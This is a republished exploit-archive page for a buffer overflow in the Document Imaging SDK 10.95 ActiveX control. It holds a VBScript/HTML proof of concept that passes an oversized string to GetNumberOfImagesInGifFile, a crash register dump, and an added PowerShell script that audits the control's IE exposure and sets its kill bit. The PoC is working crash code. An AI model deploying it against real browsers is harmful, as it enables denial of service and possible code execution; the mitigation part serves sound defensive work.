Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC
Published: 2016-12-21 Source: 查字典 editors

<!--

Document Imaging SDK Buffer Overflow Vulnerability

DoS Proof of concept

Author: r0ut3r

Mail : writ3r [at] gmail.com

-----------------------------

-Tested on WinXP Pro SP2

Version: 10.95

Vendor : Black Ice Software

Price : $999

File : biimgfrm.ocx

CLSID: {79956462-F148-497F-B247-DF35A095F80B}

DLL Settings:

RegKey Safe for Script: True

RegKey Safe for Init : True

KillBitSet : False

Register:

EIP 7C91B3FB -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EAX 001919C0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBX 41414141

ECX 00004141

EDX 00150168 -> 00000000

EDI 41414141

ESI 001919B8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

EBP 0013EA20 -> 0013EAA4

ESP 0013E804 -> 0000021A

-----------------------------

-->

<object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='test'></object>

<script language='vbscript'>

Sub Boom

buff = String(14356, "A")

test.GetNumberOfImagesInGifFile buff

End Sub

</script>

<input type=button onclick=Boom() value='Boom?'>
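
The header above lists the control as Safe for Script and Safe for Init with no kill bit set, which is what lets a web page instantiate it in Internet Explorer. The following PowerShell is an added example, not part of the original PoC or the vendor's code: it audits those three settings for the CLSID in the header and can set the kill bit. The function names are hypothetical; the registry locations and the 0x400 flag are the standard Internet Explorer ActiveX compatibility settings.

```powershell
# Added example: audit the IE exposure of the control named in the PoC header.
$Clsid         = '{79956462-F148-497F-B247-DF35A095F80B}'  # CLSID from the PoC header
$KillBit       = 0x400                                     # COMPAT_EVIL_DONT_LOAD
$SafeForScript = '{7DD95801-9882-11CF-9FA9-00AA006C4A8B}'  # CATID_SafeForScripting
$SafeForInit   = '{7DD95802-9882-11CF-9FA9-00AA006C4A8B}'  # CATID_SafeForInitializing

function Get-ActiveXExposure {          # hypothetical helper name
    param([string]$Clsid)
    # A 32-bit control on 64-bit Windows registers under Wow6432Node, so check both views.
    $views = [ordered]@{ Native = 'HKLM:\SOFTWARE'; Wow6432Node = 'HKLM:\SOFTWARE\Wow6432Node' }
    foreach ($view in $views.GetEnumerator()) {
        $compat = "$($view.Value)\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $class  = "$($view.Value)\Classes\CLSID\$Clsid"
        $flags  = 0
        if (Test-Path -LiteralPath $compat) {
            $v = (Get-ItemProperty -LiteralPath $compat -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($null -ne $v) { $flags = [int]$v }
        }
        [pscustomobject]@{
            View          = $view.Key
            Registered    = Test-Path -LiteralPath $class
            SafeForScript = Test-Path -LiteralPath "$class\Implemented Categories\$SafeForScript"
            SafeForInit   = Test-Path -LiteralPath "$class\Implemented Categories\$SafeForInit"
            KillBitSet    = ($flags -band $KillBit) -ne 0
        }
    }
}

function Set-ActiveXKillBit {           # hypothetical helper name; needs an elevated session
    param([string]$Clsid, [string]$Root = 'HKLM:\SOFTWARE')
    $key = "$Root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    $cur = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).'Compatibility Flags'
    # Preserve any existing flags and OR in the kill bit.
    Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Type DWord `
        -Value (([int]$cur) -bor $KillBit)
}

# Report current state; a row with Registered = True and KillBitSet = False is exposed.
Get-ActiveXExposure -Clsid $Clsid | Format-Table -AutoSize

# To mitigate, set the kill bit in both registry views:
# Set-ActiveXKillBit -Clsid $Clsid
# Set-ActiveXKillBit -Clsid $Clsid -Root 'HKLM:\SOFTWARE\Wow6432Node'
```

The kill bit only stops Internet Explorer and other hosts that honour it from loading the control; applications that create the object directly are unaffected.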
